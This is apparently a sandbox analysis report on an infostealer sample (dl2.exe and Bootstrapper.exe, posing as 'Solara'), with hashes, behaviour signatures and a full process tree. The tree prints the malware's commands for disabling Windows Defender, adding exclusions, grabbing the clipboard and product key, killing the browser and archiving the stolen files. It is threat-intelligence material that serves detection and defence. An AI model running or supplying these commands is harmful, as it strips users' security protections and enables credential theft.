Resubmissions
submitted         analysis id         score
02-10-2024 11:53  241002-n2j6fsycqb   3
13-09-2024 04:59  240913-fmwxpswcpb   3
11-09-2024 15:54  240911-tcmg6sygmm   3
11-09-2024 15:53  240911-tbsmsszbnh   10
25-08-2024 22:53  240825-2t6als1gll   10
24-08-2024 21:25  240824-z93hjsscrp   9
24-08-2024 21:20  240824-z65thazfpa   10
21-08-2024 23:05  240821-23av3azamj   10
21-08-2024 16:22  240821-tvn4qayekh   3
21-08-2024 16:20  240821-ttkd5sydng   10
Analysis
max time kernel: 140s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-08-2024 21:25
Static task
static1
Behavioral task
behavioral1
Sample
dl2.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
dl2.exe
Resource
win10v2004-20240802-en
General
Target: dl2.exe
Size: 849KB
MD5: c2055b7fbaa041d9f68b9d5df9b45edd
SHA1: e4bd443bd4ce9029290dcd4bb47cb1a01f3b1b06
SHA256: 342f04c4720590c40d24078d46d9b19d8175565f0af460598171d58f5ffc48f3
SHA512: 18905b75938b8af9468b1aa3ffbae796a139c2762e623aa6ffb9ec2b293dd04aa1f90d1ed5a7dbda7853795a3688e368121a134c7f63e527a8e5e7679301a1dc
SSDEEP: 12288:A3RY3yNqMRTF4q2rxHn2ot/81xpNQyjUXlmoe7ufjHAtjXD7r2:A3RY3R24q+xn/8Xp2yOl5fzQ/2
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid   process
3392  powershell.exe
6068  powershell.exe
5948  powershell.exe
3520  powershell.exe
Downloads MZ/PE file
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 5 IoCs
Processes:
pid   process
1856  Bootstrapper.exe
5152  Bootstrapper.exe
5612  Bootstrapper.exe
5652  Bootstrapper.exe
5592  rar.exe
Loads dropped DLL 33 IoCs
Processes:
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
127   ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
pid   process
6116  tasklist.exe
5384  tasklist.exe
3972  tasklist.exe
5248  tasklist.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
pid   process
3820  WMIC.exe
2308  WMIC.exe
4428  WMIC.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description        ioc                                                                     process
Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                      msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer   msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName    msedge.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 11 IoCs
Processes:
pid   process
5840  taskkill.exe
3968  taskkill.exe
5896  taskkill.exe
3160  taskkill.exe
1844  taskkill.exe
4872  taskkill.exe
6104  taskkill.exe
2456  taskkill.exe
2064  taskkill.exe
1912  taskkill.exe
6112  taskkill.exe
NTFS ADS 1 IoCs
Processes:
description                   ioc                                                                  process
File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 672106.crdownload:SmartScreen   msedge.exe
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
Processes:
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Suspicious use of FindShellTrayWindow 38 IoCs
Processes:
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid   process
2424  dl2.exe
2676  dl2.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes
C:\Users\Admin\AppData\Local\Temp\dl2.exe (level 1)
  command: "C:\Users\Admin\AppData\Local\Temp\dl2.exe"
  - Suspicious use of SetWindowsHookEx
  PID:2424

C:\Users\Admin\AppData\Local\Temp\dl2.exe (level 1)
  command: C:\Users\Admin\AppData\Local\Temp\dl2.exe {68D4A697-584F-4F49-88A1-63BA3B2BF2FC}
  - Suspicious use of SetWindowsHookEx
  PID:2676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 1)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3044
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb445e46f8,0x7ffb445e4708,0x7ffb445e4718
  PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  PID:4968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
  PID:1684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
  PID:4720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  PID:1800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  PID:1932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
  PID:2172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
  PID:1000

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
  PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:1932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  PID:1504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  PID:1064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  PID:5300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
  PID:6128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
  PID:4708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
  PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5668 /prefetch:8
  PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
  PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6424 /prefetch:8
  PID:5240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (level 2)
  command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6504 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:5352
C:\Users\Admin\Downloads\Bootstrapper.exe (level 2)
  command: "C:\Users\Admin\Downloads\Bootstrapper.exe"
  - Executes dropped EXE
  PID:1856

C:\Users\Admin\Downloads\Bootstrapper.exe (level 3)
  command: "C:\Users\Admin\Downloads\Bootstrapper.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5612

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Bootstrapper.exe'"
  PID:5800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
  command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Bootstrapper.exe'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3392

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
  PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
  command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5948

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Thanks for using solara! Redirecting you to solara.', 0, 'Solara', 48+16);close()""
  PID:5832

C:\Windows\system32\mshta.exe (level 5)
  command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Thanks for using solara! Redirecting you to solara.', 0, 'Solara', 48+16);close()"
  PID:5712

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID:4300

C:\Windows\system32\tasklist.exe (level 5)
  command: tasklist /FO LIST
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:6116

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
  PID:4868

C:\Windows\System32\Wbem\WMIC.exe (level 5)
  command: wmic csproduct get uuid
  - Suspicious use of AdjustPrivilegeToken
  PID:4372

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
  PID:5676

C:\Windows\system32\reg.exe (level 5)
  command: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
  PID:228

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
  PID:60

C:\Windows\system32\reg.exe (level 5)
  command: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
  PID:1568

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
  PID:3988

C:\Windows\System32\Wbem\WMIC.exe (level 5)
  command: wmic path win32_VideoController get name
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3820

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
  PID:2064

C:\Windows\System32\Wbem\WMIC.exe (level 5)
  command: wmic path win32_VideoController get name
  - Detects videocard installed
  PID:2308

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
  PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 5)
  command: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:6068

C:\Windows\system32\cmd.exe (level 4)
  command: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
  PID:5912

C:\Windows\System32\Conhost.exe (level 5)
  command: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID:5652
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5884
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:6096
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:4324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:4288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:5456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3628
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2936
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3704
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"4⤵PID:5684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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5⤵
- Suspicious behavior: EnumeratesProcesses
PID:220 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\riewjwqd\riewjwqd.cmdline"6⤵PID:852
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7601.tmp" "c:\Users\Admin\AppData\Local\Temp\riewjwqd\CSC9914BB635D4B4213932066FD2D966292.TMP"7⤵PID:2308
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5932
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:228
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3420
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5780
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5896
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3044"4⤵PID:1220
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30445⤵
- Kills process with taskkill
PID:3968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3276"4⤵PID:2464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3420
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32765⤵
- Kills process with taskkill
PID:5840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4968"4⤵PID:5780
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49685⤵
- Kills process with taskkill
PID:6112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"4⤵PID:5724
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16845⤵
- Kills process with taskkill
PID:5896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4720"4⤵PID:4828
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47205⤵
- Kills process with taskkill
PID:3160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1000"4⤵PID:5504
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3972
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 10005⤵
- Kills process with taskkill
PID:1844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6128"4⤵PID:6088
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 61285⤵
- Kills process with taskkill
PID:4872 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4708"4⤵PID:5676
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47085⤵
- Kills process with taskkill
PID:6104 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4172"4⤵PID:3216
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 41725⤵
- Kills process with taskkill
PID:2456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"4⤵PID:4372
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17525⤵
- Kills process with taskkill
PID:2064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5508"4⤵PID:5920
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 55085⤵
- Kills process with taskkill
PID:1912 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5448
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\OujDI.zip" *"4⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI18562\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\OujDI.zip" *5⤵
- Executes dropped EXE
PID:5592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:5488
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:5856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:5044
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1804
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:216
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5376 -
C:\Users\Admin\Downloads\Bootstrapper.exe"C:\Users\Admin\Downloads\Bootstrapper.exe"2⤵
- Executes dropped EXE
PID:5152 -
